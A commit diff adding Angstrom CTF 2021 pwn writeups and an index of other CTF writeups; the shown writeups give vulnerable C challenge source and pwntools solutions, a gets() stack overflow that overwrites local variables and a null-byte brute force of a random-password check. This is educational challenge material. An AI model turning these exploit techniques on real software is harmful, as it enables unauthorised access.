Added all CTF writeups to gitbook (2021-2024)

Author: Crypto-Cat

2021/README.md

@@ -0,0 +1,85 @@
+## Pico
+
+-   [Pwn: Unsubscriptions Are Free](pico_21/pwn/unsubscriptions_are_free/unsubscriptions_are_free.md)
+
+## Crusaders of Rust (COR)
+
+-   [Crypto: Fibinary](cor_21/crypto/fibinary/fibinary.md)
+-   [Pwn: Chainblock](cor_21/pwn/chainblock/chainblock.md)
+
+## HTB Cyber Santa
+
+-   [Crypto: Meet Me Halfway](htb_cyber_santa_21/crypto/meet_me_halfway/meet_me_halfway.md)
+-   [Crypto: Xmas Spirit](htb_cyber_santa_21/crypto/xmas_spirit/xmas_spirit.md)
+-   [Pwn: Minimelfistic](htb_cyber_santa_21/pwn/minimelfistic/minimelfistic.md)
+-   [Pwn: Mr. Snowy](htb_cyber_santa_21/pwn/mr_snowy/mr_snowy.md)
+-   [Pwn: Naughty List](htb_cyber_santa_21/pwn/naughty_list/naughty_list.md)
+-   [Pwn: Sleigh](htb_cyber_santa_21/pwn/sleigh/sleigh.md)
+-   [Rev: Infiltration](htb_cyber_santa_21/rev/infiltration/infiltration.md)
+-   [Rev: Intercept](htb_cyber_santa_21/rev/intercept/intercept.md)
+
+## K3rn3l
+
+-   [Crypto: Badseed](k3rn3l_21/crypto/badseed/badseed.md)
+-   [Crypto: Twizzty Buzzinezz](k3rn3l_21/crypto/twizzty_buzzinezz/twizzty_buzzinezz.md)
+
+## HTB x Synack RedTeamFive
+
+-   [Misc: Context](htb_synack_redteamfive_21/misc/context/context.md)
+-   [Misc: Hotel](htb_synack_redteamfive_21/misc/hotel/hotel.md)
+-   [Pwn: Air Supplies](htb_synack_redteamfive_21/pwn/air_supplies/air_supplies.md)
+-   [Pwn: Injection Shot](htb_synack_redteamfive_21/pwn/injection_shot/injection_shot.md)
+-   [Pwn: Library](htb_synack_redteamfive_21/pwn/library/library.md)
+-   [Pwn: Recruitment](htb_synack_redteamfive_21/pwn/recruitment/recruitment.md)
+-   [Rev: Knock Knock](htb_synack_redteamfive_21/rev/knock_knock/knock_knock.md)
+-   [Rev: Split](htb_synack_redteamfive_21/rev/split/split.md)
+
+## KillerQueen
+
+-   [Pwn: A Kind of Magic](killerqueen_21/pwn/a_kind_of_magic/a_kind_of_magic.md)
+-   [Pwn: Tweety Birb](killerqueen_21/pwn/tweety_birb/tweety_birb.md)
+-   [Pwn: Zoom2Win](killerqueen_21/pwn/zoom2win/zoom2win.md)
+
+## HacktivityCon
+
+-   [Pwn: Retcheck](hacktivitycon_21/pwn/retcheck/retcheck.md)
+-   [Pwn: The Library](hacktivitycon_21/pwn/the_library/the_library.md)
+-   [Pwn: Yabo](hacktivitycon_21/pwn/yabo/yabo.md)
+-   [Web: Availability](hacktivitycon_21/web/availability/availability.md)
+
+## CSAW
+
+-   [Pwn: Alien Math](csaw_21/pwn/alien_math/alien_math.md)
+-   [Pwn: Password Checker](csaw_21/pwn/password_checker/password_checker.md)
+-   [Rev: Checker](csaw_21/rev/checker/checker.md)
+
+## HackyHolidays
+
+-   [Crypto: Cute Invoice](hackyholidays_21/crypto/cute_invoice/cute_invoice.md)
+-   [Crypto: Mineslazer](hackyholidays_21/crypto/mineslazer/mineslazer.md)
+-   [Forensics: Injection Traffic](hackyholidays_21/forensics/injection_traffic/injection_traffic.md)
+-   [Forensics: Power Snacks](hackyholidays_21/forensics/power_snacks/power_snacks.md)
+-   [Pwn: Deleted Flag](hackyholidays_21/pwn/deleted_flag/deleted_flag.md)
+-   [Pwn: Engine Control](hackyholidays_21/pwn/engine_control/engine_control.md)
+-   [Web: Skylark](hackyholidays_21/web/skylark/skylark.md)
+
+## HTB Cyber Apocalypse
+
+-   [Crypto: Phasestream](cyber_apocalypse_21/crypto/phasestream/phasestream.md)
+-   [Misc: Alien Camp](cyber_apocalypse_21/misc/alien_camp/alien_camp.md)
+-   [Misc: Build Yourself In](cyber_apocalypse_21/misc/build_yourself_in/build_yourself_in.md)
+-   [Pwn: Controller](cyber_apocalypse_21/pwn/controller/controller.md)
+-   [Pwn: System Drop](cyber_apocalypse_21/pwn/system_drop/system_drop.md)
+-   [Web: Blitzprop](cyber_apocalypse_21/web/blitzprop/blitzprop.md)
+-   [Web: E-Tree](cyber_apocalypse_21/web/e_tree/e_tree.md)
+-   [Web: Wild Goose Hunt](cyber_apocalypse_21/web/wild_goose_hunt/wild_goose_hunt.md)
+
+## Angstrom
+
+-   [Pwn: Sanity Checks](angstrom_21/pwn/sanity_checks/sanity_checks.md)
+-   [Pwn: Secure Login](angstrom_21/pwn/secure_login/secure_login.md)
+-   [Pwn: Sticky Stacks](angstrom_21/pwn/stickystacks/sticky_stacks.md)
+-   [Pwn: Tranquil](angstrom_21/pwn/tranquil/tranquil.md)
+-   [Rev: Free Flags](angstrom_21/rev/free_flags/free_flags.md)
+-   [Rev: Jailbreak](angstrom_21/rev/jailbreak/jailbreak.md)
+-   [Web: Jar](angstrom_21/web/jar/jar.md)

2021/angstrom_21/pwn/sanity_checks/sanity_checks.md

@@ -0,0 +1,162 @@
+---
+name: Sanity Checks (2021)
+event: Angstrom CTF 2021
+category: Pwn
+description: Writeup for Sanity Checks (pwn) - Angstrom CTF (2021) 💜
+layout:
+    title:
+        visible: true
+    description:
+        visible: true
+    tableOfContents:
+        visible: true
+    outline:
+        visible: true
+    pagination:
+        visible: true
+---
+
+# Sanity Checks
+
+## Video Walkthrough
+
+[![VIDEO](https://img.youtube.com/vi/2pqG6opzrug/0.jpg)](https://youtu.be/2pqG6opzrug?t=1135s "Angstrom 2021: Sanity Checks")
+
+## Challenge Description
+
+> I made a program (source) to protect my flag. On the off chance someone does get in, I added some sanity checks to detect if something fishy is going on.
+
+## Source
+
+{% code overflow="wrap" %}
+```c
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+void main(){
+    setbuf(stdout, NULL);
+    setbuf(stderr, NULL);
+
+    char password[64];
+    int ways_to_leave_your_lover = 0;
+    int what_i_cant_drive = 0;
+    int when_im_walking_out_on_center_circle = 0;
+    int which_highway_to_take_my_telephones_to = 0;
+    int when_i_learned_the_truth = 0;
+
+    printf("Enter the secret word: ");
+
+    gets(&password);
+
+    if(strcmp(password, "password123") == 0){
+        puts("Logged in! Let's just do some quick checks to make sure everything's in order...");
+        if (ways_to_leave_your_lover == 50) {
+            if (what_i_cant_drive == 55) {
+                if (when_im_walking_out_on_center_circle == 245) {
+                    if (which_highway_to_take_my_telephones_to == 61) {
+                        if (when_i_learned_the_truth == 17) {
+                            char flag[128];
+
+                            FILE *f = fopen("flag.txt","r");
+
+                            if (!f) {
+                                printf("Missing flag.txt. Contact an admin if you see this on remote.");
+                                exit(1);
+                            }
+
+                            fgets(flag, 128, f);
+
+                            printf(flag);
+                            return;
+                        }
+                    }
+                }
+            }
+        }
+        puts("Nope, something seems off.");
+    } else {
+        puts("Login failed!");
+    }
+}
+```
+{% endcode %}
+
+## Solution
+
+{% code overflow="wrap" %}
+```py
+from pwn import *
+
+def start(argv=[], *a, **kw):
+    if args.GDB:  # Set GDBscript below
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    elif args.REMOTE:  # ('server', 'port')
+        return remote(sys.argv[1], sys.argv[2], *a, **kw)
+    else:  # Run locally
+        return process([exe] + argv, *a, **kw)
+
+def find_ip(payload):
+    # Launch process and send payload
+    p = process(exe)
+    p.sendlineafter(':', payload)
+    # Wait for the process to crash
+    p.wait()
+    # Print out the address of EIP/RIP at the time of crashing
+    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4))
+    info('located EIP/RIP offset at {a}'.format(a=ip_offset))
+    return ip_offset
+
+# Specify your GDB script here for debugging
+gdbscript = '''
+init-pwndbg
+break *0x401235
+break *0x40123f
+continue
+'''.format(**locals())
+
+# Set up pwntools for the correct architecture
+exe = './checks'
+# This will automatically get context arch, bits, os etc
+elf = context.binary = ELF(exe, checksec=False)
+# Enable verbose logging so we can see exactly what is being sent (info/debug)
+context.log_level = 'debug'
+
+# ===========================================================
+#                    EXPLOIT GOES HERE
+# ===========================================================
+
+password = b"password123\x00"
+
+# Pass in pattern_size, get back EIP/RIP offset
+offset = find_ip(password + cyclic(100))
+offset -= len(password)
+
+# Start program
+io = start()
+
+# Build the payload
+payload = flat([
+    password,
+    (offset - 16) * asm('nop'),
+    p32(0x11),
+    p32(0x3d),
+    p32(0xf5),
+    p32(0x37),
+    p32(0x32),
+])
+
+# Save the payload to file
+write('payload', payload)
+
+# Send the payload
+io.sendlineafter(':', payload)
+io.recvline()
+
+# Get our flag!
+flag = io.recv()
+success(flag)
+```
+{% endcode %}
+
+Flag: `actf{if_you_aint_bout_flags_then_i_dont_mess_with_yall}`

2021/angstrom_21/pwn/secure_login/secure_login.md

@@ -0,0 +1,117 @@
+---
+name: Secure Login (2021)
+event: Angstrom CTF 2021
+category: Pwn
+description: Writeup for Secure Login (pwn) - Angstrom CTF (2021) 💜
+layout:
+    title:
+        visible: true
+    description:
+        visible: true
+    tableOfContents:
+        visible: true
+    outline:
+        visible: true
+    pagination:
+        visible: true
+---
+
+# Secure Login
+
+## Video Walkthrough
+
+[![VIDEO](https://img.youtube.com/vi/2pqG6opzrug/0.jpg)](https://youtu.be/2pqG6opzrug?t=23s "Angstrom 2021: Secure Login")
+
+## Challenge Description
+
+> My login is, potentially, and I don't say this lightly, if you know me you know that's the truth, it's truly, and no this isn't snake oil, this is, no joke, the most secure login service in the world (source).
+
+## Source
+
+{% code overflow="wrap" %}
+```c
+#include <stdio.h>
+
+char password[128];
+
+void generate_password() {
+	FILE *file = fopen("/dev/urandom","r");
+	fgets(password, 128, file);
+	fclose(file);
+}
+
+void main() {
+	puts("Welcome to my ultra secure login service!");
+
+	// no way they can guess my password if it's random!
+	generate_password();
+
+	char input[128];
+	printf("Enter the password: ");
+	fgets(input, 128, stdin);
+
+	if (strcmp(input, password) == 0) {
+		char flag[128];
+
+		FILE *file = fopen("flag.txt","r");
+		if (!file) {
+		    puts("Error: missing flag.txt.");
+		    exit(1);
+		}
+
+		fgets(flag, 128, file);
+		puts(flag);
+	} else {
+		puts("Wrong!");
+	}
+}
+```
+{% endcode %}
+
+## Solution
+
+{% code overflow="wrap" %}
+```py
+from pwn import *
+
+def start(argv=[], *a, **kw):
+    if args.GDB:  # Set GDBscript below
+        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
+    elif args.REMOTE:  # ('server', 'port')
+        return remote(sys.argv[1], sys.argv[2], *a, **kw)
+    else:  # Run locally
+        return process([exe] + argv, *a, **kw)
+
+# Specify your GDB script here for debugging
+gdbscript = '''
+init-pwndbg
+continue
+'''.format(**locals())
+
+# Set up pwntools for the correct architecture
+exe = './login'
+# This will automatically get context arch, bits, os etc
+elf = context.binary = ELF(exe, checksec=False)
+# Enable verbose logging so we can see exactly what is being sent (info/debug)
+context.log_level = 'warn'
+
+# ===========================================================
+#                    EXPLOIT GOES HERE
+# ===========================================================
+
+# Run program 1000 times (hoping for null byte)
+for i in range(1000):
+    io = start()
+    io.recv()
+    # Try to login with null byte
+    io.sendline(b"\x00")
+    io.recvuntil(': ')
+    response = io.recv()
+    # Did we get the flag?
+    if(not b'Wrong!' in response):
+        print(response)
+    io.close()
+```
+{% endcode %}
+
+Flag: `actf{if_youre_reading_this_ive_been_hacked}`